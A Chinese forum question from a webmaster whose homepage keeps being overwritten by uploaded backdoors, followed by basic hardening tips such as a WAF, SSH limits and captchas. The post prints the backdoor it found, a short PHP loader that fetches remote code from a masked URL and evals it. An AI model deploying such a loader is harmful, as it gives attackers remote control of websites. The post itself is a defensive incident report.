【已解答】如何插件某个主机的文件操作日志，防止后门

最近网站经常被上传后门文件，如何知道后门文件是通过什么方式被创建的，上传的后门是这样的，每次都把网站首页修改掉，有没有遇到类似情况的，大家如何解决的呀

1. <?php
   
2. function get_contents($url){
   
3.   $ch = curl_init("$url");
   
4.   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
   
5.   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
   
6.   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0(Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
   
7.   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
   
8.   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
   
9.   curl_setopt($ch, CURLOPT_COOKIEJAR,$GLOBALS['coki']);
   
10.   curl_setopt($ch, CURLOPT_COOKIEFILE,$GLOBALS['coki']);
    
11.   $result = curl_exec($ch);
    
12.   return $result;
    
13. }
    
14. $a = get_contents('http://xxxxxxxxxx/1235.txt');
    
15. eval('?>'.$a);

复制代码

收集的一些防挂马、篡改、恶意提权的小防护攻略。
1.网站上线前，对自己的项目用常用的一些工具进行程序漏洞安全扫描，并且做多份备份；
2.为了安全起见，网站后台管理地址经常改，改完做多份纪录保存，并且做好历史修改记录；
3.默认数据库名称要改，能复杂尽量复杂，用好复制粘贴按键；
4.后台启用验证码登录模块，不要怕麻烦，人家弄您网站的人都不嫌麻烦；
5.做好网站防护，比如非法上传文件、会员上传恶意文件的功能等，装好web防火墙；
6.服务器主机的ssh能不开就不能，尽量少使用root用户登录；即使登录也做好登录限制为仅允许自己的ip，高强度复杂的密码是第一必设项；
7.宝塔面板有多个辅助防护插件，例如调用系统防火墙、web防火墙（nginx防火墙/apache防火墙）、php安全防护、防篡改、防入侵等。